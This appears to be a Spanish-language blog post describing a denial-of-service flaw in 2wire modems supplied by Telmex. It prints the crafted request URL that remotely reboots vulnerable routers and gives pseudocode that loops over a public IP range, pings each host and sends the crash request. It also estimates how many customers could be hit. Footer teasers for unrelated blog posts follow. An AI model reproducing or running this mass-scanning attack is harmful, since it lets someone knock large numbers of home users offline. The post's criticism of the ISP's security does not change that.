Sobre cierto modem...

Ahora que estuve en el X25 oí sobre cierto exploit que permitiría realizar un DoS (Denial of Service) a muchos modems de telmex de la marca 2wire que son vulnerables a este fallo:

https://:50001/xslt?page=%0d%0a

lo que permite que se reinicie de manera remota el router que sea vulnerable, muchos se quedaron impactados y otros tantos incrédulos, respecto a esta posibilidad, sin embargo claro que es posible hacerlo de hecho es bastante sencillo, pensemos que nuestra IP pública es del rango: 189.253.x.x bueno esto admite unas 64516 posibilidades de IPs publicas (en realidad  y en honor a la verdad deberían de ser 65536, sin embargo estoy descartando las que tengan cero o 255 al final, es decir cada parte de nuestra IP es un número de 8 bits, lo que implica que haya 256 IPs para cada parte, estas IPs estarán en el rango 0-255, por lo que para dos grupos será un número de 16 bits es decir 2 elevado a la potencia 16, pero si omitimos las que tengan un cero o 255 al final tendrían que ir de 1-254, por lo que bastaría con elevar al cuadrado el 254 y listo), basta de cuestiones matemáticas vamos a lo importante jeje, si consideramos lo anterior bastaría con crear una rutina mediante un par de ciclos for anidados para completar la tarea de intentar denegar los servicios de esta compañía a los modems de esta marca, bien si quisieran incrementar el rango de afectados bastaría con anidar un ciclo for más y eso nos llevaría a unas 16387064 posibilidades, ahora considerando que solo el 10% de esos fuese vulnerable entonces tendríamos un vector de ataque de 1638706 para este caso y 6451 para el primero .4 más .4 menos.

Acá les dejo un ejemplo de como podría quedar esto:

Cuerpo=189.253.
For x de 1 a 254
  For y de 1 a 254
    IP=Cuerpo & valor_x & "." & valor_y
    (confirmamos si la IP existe por medio de un PING aunque esto es opcional)
    Respuesta=PING valor_IP
    If valor_Respuesta Then
      GET "https://valor_IP:50001/xslt?page=%0d%0a"
    End If
  Next
Next

Bueno como se podrán dar cuenta es prácticamente un pseudo código, que solo sirve de ejemplo de como podría estructurarse este ataque, resulta evidente decir que si alguien lo codificará tendría que añadir una comprobación para evitar el DoS a su propia IP, además de que resultaría demasiado ruidoso, por decirlo de alguna manera realizar tantas conexiones.

Sin embargo queda expuesta nuevamente lo poco fiable que es nuestra empresa monopolista de servicios de internet a la hora de escoger los routers que nos darán acceso a la alta velocidad (jajaja), de balde lo que invierten en tecnología si no son capaces de determinar las posibles vulnerabilidades a las que dejan expuestos a sus clientes a la hora de venderles un servicio.

SaluDoS!!

Comentarios

Publicar un comentario

Tu opinión es importante compartela...

Entradas populares de este blog

Detener la sincronización de tiempo/fechas entre Host y Guest en Virtual Box

Imagen
Ésta es otra de esas entradas que surgieron a partir de una necesidad sencilla pero para la cual no hay mucha documentación y la que hay no es del todo clara. El problema en cuestión surge al intentar cambiar la fecha del sistema en nuestro SO huésped (virtualizado) y quedar frustrados tras varios intentos porque la fecha cambia después de unos segundos, esto se debe a que un servicio en concreto se encarga de hacerlo, éste servicio es parte de las "Guest Additions", suele ser de mucha ayuda, sin embargo en ocasiones conviene cambiar la fecha de nuestro sistema ya sea para registrar programas, alterar fechas de creación de documento, seguido de una larga lista de etcéteras. Para el caso de los huéspedes (Guests) Windows se llama "VboxService.exe" y se encuentra ubicado en la carpeta "System32"  y para los huéspedes Linux "vboxadd-timesync" y se encuentra instalado en "/etc/init.d". Asumiré que tienen instaladas las "Guest
Leer más

Extraer datos de un archivo.mdb (Access) con python

Luego de mucho tiempo fuera de línea, me decidí a escribir sobre algo que me pareció muy interesante, resulta que por azares del destino tuve que extraer la información de un archivo mdb y para colmo de males desde una MAC; al principio probé usar una herramienta llamada MDB Explorer , aunque su precio es accesible, la verdad es que me sentía un poco molesto de no poder hacerlo más a mi propio estilo, fue entonces que me puse a investigar como tener acceso al contenido de una base de datos de Access desde Python; encontré un par de librerías ( pyodbc y pypyodbc , de las cuales sólo funcionó la segunda al menos en MAC), pero aún no estaba satisfecho, fue entonces que por otro azar del destino encontré un scrip t que decía poder extraer el contenido de las tablas de una base de datos en formato CSV, luego de analizar el código de dicho script, me decidí a leer un poco más sobre el uso de la herramienta que en realidad hace el trabajo, fue así  que descubrí mbd-tools , así que sin más f
Leer más

Solución al problema con odbc pgsql (postgresql) en Windows 7 de 64 bits

Hace poco tuve que lidiar con la instalación de un driver ODBC para Postgresql desde Windows 7 (x64) la verdad es que normalmente no había tenido ningún problema para crear conexiones DSN, sin embargo por alguna extraña razón la versión "Home Basic" de este jodido sistema fue una piedrita en el zapato, como me dí cuenta de que es más común de lo que parece, decidí escribir este post a fin de compartir la solución con otros. El problema Según leí en la documentación en inglés, se deriva de que a "los genios de Microsoft" se les ocurrió dejar dos versiones del mismo programa encargado de generar los orígenes DSN ODBC (por aquello de las compatibilidades en el sistema) concretamente es un programa llamado "odbcad32.exe", hasta aquí tiene sentido y mi comentario sarcástico respecto al tema parece fuera de lugar (pero no uso el sarcasmo a la ligera), el problema es que la versión del programa de 32 bits esta alojada en la carpeta "C:\WINDOWS\SysWO
Leer más